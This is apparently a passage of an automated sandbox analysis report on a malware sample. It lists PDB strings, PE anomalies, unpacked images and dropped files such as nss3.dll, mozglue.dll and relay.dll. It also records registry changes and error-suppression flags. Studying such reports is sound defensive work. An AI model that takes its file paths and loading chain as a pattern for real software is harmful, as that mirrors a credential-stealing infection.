                          Source: Binary string: \C:\nuze3\jimikusub 32\keb61_foyemi\38-vovake.pdb source: wxfSIz4PAi.exe, 00000000.00000002.1986225613.000000000412E000.00000004.00000020.00020000.00000000.sdmp, wxfSIz4PAi.exe, 00000000.00000000.1609516456.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                          Source: Binary string: M:\DATA\Projects\BitClipper2017\Release\BitClipper2017.pdb source: EGIJKEHCAK.exe, 00000013.00000000.2121163542.000000000071C000.00000002.00000001.01000000.00000014.sdmp, EGIJKEHCAK.exe, 00000013.00000002.2868926481.000000000071C000.00000002.00000001.01000000.00000014.sdmp
                          Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_ko-kr\obj\Release\Locale_ko-kr.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2111483520.0000027279CEB000.00000002.00000001.01000000.00000013.sdmp
                          Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_de-de\obj\Release\Locale_de-de.pdbF source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2111483520.0000027279CEB000.00000002.00000001.01000000.00000013.sdmp
                          Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_fr-fr\obj\Release\Locale_fr-fr.pdbf source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2111483520.0000027279CEB000.00000002.00000001.01000000.00000013.sdmp
                          Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_es-es\obj\Release\Locale_es-es.pdb. source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2111483520.0000027279CEB000.00000002.00000001.01000000.00000013.sdmp
                          Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_pt-br\obj\Release\Locale_pt-br.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2111483520.0000027279CEB000.00000002.00000001.01000000.00000013.sdmp
                          Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net45/Newtonsoft.Json.pdbSHA256 source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2111483520.0000027279CEB000.00000002.00000001.01000000.00000013.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2927691162.000002727CDC0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2903506370.00000272100C3000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_it-it\obj\Release\Locale_it-it.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2111483520.0000027279CEB000.00000002.00000001.01000000.00000013.sdmp
                          Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\InstallerCommon\obj\Release\InstallerCommon.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2920667291.000002727C8C0000.00000004.08000000.00040000.00000000.sdmp
                          Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Branding\obj\Release\Branding.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2920330280.000002727C790000.00000004.08000000.00040000.00000000.sdmp
                          Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\InstallerSMUDUI\obj\Release\InstallerSMUDUI.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2111483520.0000027279CEB000.00000002.00000001.01000000.00000013.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2931938048.000002727D080000.00000004.08000000.00040000.00000000.sdmp
                          Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net45/Newtonsoft.Json.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2111483520.0000027279CEB000.00000002.00000001.01000000.00000013.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2927691162.000002727CDC0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2903506370.00000272100C3000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\InstallerCommon\obj\Release\InstallerCommon.pdb4 source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2920667291.000002727C8C0000.00000004.08000000.00040000.00000000.sdmp
                          Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_ja-jp\obj\Release\Locale_ja-jp.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2111483520.0000027279CEB000.00000002.00000001.01000000.00000013.sdmp
                          Source: Binary string: wntdll.pdbUGP source: run.exe, 00000002.00000002.1866972606.0000000003900000.00000004.00000800.00020000.00000000.sdmp, run.exe, 00000002.00000002.1867218514.0000000003DB7000.00000004.00000001.00020000.00000000.sdmp, run.exe, 00000002.00000002.1866008850.00000000027BD000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2163183799.0000000005416000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2163536288.00000000058F0000.00000004.00001000.00020000.00000000.sdmp, run.exe, 00000014.00000002.2292633080.000000000471F000.00000004.00000001.00020000.00000000.sdmp, run.exe, 00000014.00000002.2292037261.0000000004260000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: /_/obj/Release/TelemetryChannel/net452/Microsoft.AI.ServerTelemetryChannel.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2111483520.0000027279CEB000.00000002.00000001.01000000.00000013.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2903506370.000002721001C000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2913908071.000002721BB00000.00000004.08000000.00040000.00000000.sdmp
                          Source: Binary string: C:\projects\dotnetzip-semverd\src\Zip\obj\Release\DotNetZip.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2929824478.000002727CEA0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2903506370.000002721007E000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: SMCommon.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2924565722.000002727CB30000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2111483520.0000027279CEB000.00000002.00000001.01000000.00000013.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2903506370.00000272100C3000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: D:\Workspace\TFS\MAINLINE\ioloCore\Dysnomia\PerceiveSDK\obj\Debug\PerceiveSDK.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2924565722.000002727CB30000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2111483520.0000027279CEB000.00000002.00000001.01000000.00000013.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2903506370.00000272100C3000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: c:\Users\dahall\Documents\Visual Studio 2010\Projects\TaskService\obj\Release\Microsoft.Win32.TaskScheduler.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2111483520.0000027279CEB000.00000002.00000001.01000000.00000013.sdmp
                          Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_nl-nl\obj\Release\Locale_nl-nl.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2111483520.0000027279CEB000.00000002.00000001.01000000.00000013.sdmp
                          Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_fr-fr\obj\Release\Locale_fr-fr.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2111483520.0000027279CEB000.00000002.00000001.01000000.00000013.sdmp
                          Source: Binary string: C:\nuze3\jimikusub 32\keb61_foyemi\38-vovake.pdb source: wxfSIz4PAi.exe, 00000000.00000002.1986225613.000000000412E000.00000004.00000020.00020000.00000000.sdmp, wxfSIz4PAi.exe, 00000000.00000000.1609516456.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                          Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Win32TaskScheduler\obj\Release\Win32TaskScheduler.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2111483520.0000027279CEB000.00000002.00000001.01000000.00000013.sdmp
                          Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_nl-nl\obj\Release\Locale_nl-nl.pdbR source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2111483520.0000027279CEB000.00000002.00000001.01000000.00000013.sdmp
                          Source: Binary string: C:\gegedirijeduho_lozome.pdb source: wxfSIz4PAi.exe, 00000000.00000003.1663398442.0000000005D81000.00000004.00000020.00020000.00000000.sdmp, u5ek.0.exe, 00000001.00000000.1661539238.0000000000413000.00000002.00000001.01000000.00000005.sdmp
                          Source: Binary string: nss3.pdb source: u5ek.0.exe, 00000001.00000002.2206659257.000000006C98F000.00000002.00000001.01000000.00000010.sdmp
                          Source: Binary string: D:\Workspace\TFS\MAINLINE\ioloCore\Dysnomia\Perceive\obj\Debug\Perceive.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2924565722.000002727CB30000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2111483520.0000027279CEB000.00000002.00000001.01000000.00000013.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2903506370.00000272100C3000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_es-es\obj\Release\Locale_es-es.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2111483520.0000027279CEB000.00000002.00000001.01000000.00000013.sdmp
                          Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_zh-tw\obj\Release\Locale_zh-tw.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2111483520.0000027279CEB000.00000002.00000001.01000000.00000013.sdmp
                          Source: wxfSIz4PAi.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                          Source: wxfSIz4PAi.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                          Source: wxfSIz4PAi.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                          Source: wxfSIz4PAi.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                          Source: wxfSIz4PAi.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

                          Data Obfuscation

                          barindex
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeUnpacked PE file: 1.2.u5ek.0.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R; vs .text:EW;.rdata:R;.data:W;.reloc:R;
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeUnpacked PE file: 0.2.wxfSIz4PAi.exe.400000.0.unpack
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeUnpacked PE file: 1.2.u5ek.0.exe.400000.0.unpack
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeCode function: 1_2_00416240 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,1_2_00416240
                          Source: relay.dll.0.drStatic PE information: real checksum: 0x18dd31 should be: 0x1877ea
                          Source: relay.dll.2.drStatic PE information: real checksum: 0x18dd31 should be: 0x1877ea
                          Source: jwjqeqx.4.drStatic PE information: real checksum: 0x0 should be: 0xc411c
                          Source: tiktok[1].exe.1.drStatic PE information: real checksum: 0x0 should be: 0x8897e
                          Source: EGIJKEHCAK.exe.1.drStatic PE information: real checksum: 0x0 should be: 0x8897e
                          Source: wxfSIz4PAi.exeStatic PE information: real checksum: 0x7838b should be: 0x7838e
                          Source: u5ek.3.exe.0.drStatic PE information: section name: .didata
                          Source: freebl3.dll.1.drStatic PE information: section name: .00cfg
                          Source: freebl3[1].dll.1.drStatic PE information: section name: .00cfg
                          Source: mozglue.dll.1.drStatic PE information: section name: .00cfg
                          Source: mozglue[1].dll.1.drStatic PE information: section name: .00cfg
                          Source: msvcp140.dll.1.drStatic PE information: section name: .didat
                          Source: msvcp140[1].dll.1.drStatic PE information: section name: .didat
                          Source: nss3.dll.1.drStatic PE information: section name: .00cfg
                          Source: nss3[1].dll.1.drStatic PE information: section name: .00cfg
                          Source: softokn3.dll.1.drStatic PE information: section name: .00cfg
                          Source: softokn3[1].dll.1.drStatic PE information: section name: .00cfg
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeCode function: 0_2_0042786C push ecx; ret 0_2_0042787C
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeCode function: 0_2_0042780C push eax; ret 0_2_0042782A
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeCode function: 0_2_0042E3A5 push esi; ret 0_2_0042E3AE
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeCode function: 0_2_00409D06 push ecx; ret 0_2_00409D19
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeCode function: 0_2_004097B6 push ecx; ret 0_2_004097C9
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeCode function: 0_2_040F74D3 pushad ; retf 0_2_040F74D4
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeCode function: 0_2_040F8568 push ecx; iretd 0_2_040F856E
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeCode function: 0_2_040F9D81 pushad ; retf 0_2_040F9D88
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeCode function: 0_2_040FB7F3 push ebp; iretd 0_2_040FB826
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeCode function: 0_2_040F9A6B push 2B991403h; ret 0_2_040F9A72
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeCode function: 0_2_040FA391 push 00000061h; retf 0_2_040FA399
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeCode function: 0_2_05B69F6D push ecx; ret 0_2_05B69F80
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeCode function: 0_2_05B7C9FD push esp; retf 0_2_05B7C9FE
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeCode function: 0_2_05B7C3FF push esp; retf 0_2_05B7C407
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeCode function: 0_2_05B81B72 push dword ptr [esp+ecx-75h]; iretd 0_2_05B81B76
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeCode function: 0_2_05B69A1D push ecx; ret 0_2_05B69A30
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeCode function: 0_2_05B87A73 push eax; ret 0_2_05B87A91
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeCode function: 1_2_004176C5 push ecx; ret 1_2_004176D8
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeCode function: 1_2_6BBAB536 push ecx; ret 1_2_6BBAB549
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.2\run.exeCode function: 2_2_0018281F push esp; retn 0031h2_2_00182820
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.2\run.exeCode function: 2_2_00181088 push esp; retn 0031h2_2_00181089
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.2\run.exeCode function: 2_2_002DFAB6 push ecx; ret 2_2_002DFAC9
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.2\run.exeCode function: 2_2_002DFB55 push ecx; ret 2_2_002DFB68
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.2\run.exeCode function: 2_2_00181DA3 push esp; retn 0031h2_2_00181DA4
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.2\run.exeCode function: 2_2_00190F0B push 8B0034D1h; retf 2_2_00190F10
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.2\run.exeCode function: 2_2_0017EF7F push esp; retf 0031h2_2_0017EF80
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.2\run.exeCode function: 2_2_0017EFA7 push eax; retf 0031h2_2_0017EFA8
                          Source: jwjqeqx.4.drStatic PE information: section name: .text entropy: 6.816444465715168
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeFile created: C:\ProgramData\mozglue.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeFile created: C:\ProgramData\nss3.dllJump to dropped file
                          Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\xtfkyJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.2\run.exeFile created: C:\Users\user\AppData\Roaming\SecureClient\relay.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\mozglue[1].dllJump to dropped file
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeFile created: C:\Users\user\AppData\Local\Temp\u5ek.0.exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\nss3[1].dllJump to dropped file
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeFile created: C:\Users\user\AppData\Local\Temp\u5ek.3.exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeFile created: C:\ProgramData\msvcp140.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\msvcp140[1].dllJump to dropped file
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeFile created: C:\Users\user\AppData\Local\Temp\u5ek.2\run.exeJump to dropped file
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeFile created: C:\Users\user\AppData\Local\Temp\u5ek.2\UIxMarketPlugin.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.2\run.exeFile created: C:\Users\user\AppData\Roaming\SecureClient\UIxMarketPlugin.dllJump to dropped file
                          Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\jwjqeqxJump to dropped file
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeFile created: C:\Users\user\AppData\Local\Temp\u5ek.2\relay.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeFile created: C:\Users\user\AppData\Local\Temp\EGIJKEHCAK.exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\tiktok[1].exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\vcruntime140[1].dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeFile created: C:\ProgramData\freebl3.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\freebl3[1].dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeFile created: C:\ProgramData\vcruntime140.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeFile created: C:\ProgramData\softokn3.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\softokn3[1].dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeFile created: C:\ProgramData\mozglue.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeFile created: C:\ProgramData\nss3.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeFile created: C:\ProgramData\msvcp140.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeFile created: C:\ProgramData\freebl3.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeFile created: C:\ProgramData\vcruntime140.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeFile created: C:\ProgramData\softokn3.dllJump to dropped file
                          Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\jwjqeqxJump to dropped file
                          Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\xtfkyJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.3.exeRegistry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\iolo ApplicationsJump to behavior

                          Hooking and other Techniques for Hiding and Protection

                          barindex
                          Source: C:\Windows\SysWOW64\cmd.exeModule Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\JWJQEQX
                          Source: C:\Windows\SysWOW64\cmd.exeModule Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\XTFKY
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeCode function: 0_2_00408761 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00408761
                          Source: C:\Users\user\Desktop\wxfSIz4PAi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.2\run.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.2\run.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.3.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.3.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.3.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.3.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.3.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.3.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.3.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\u5ek.3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
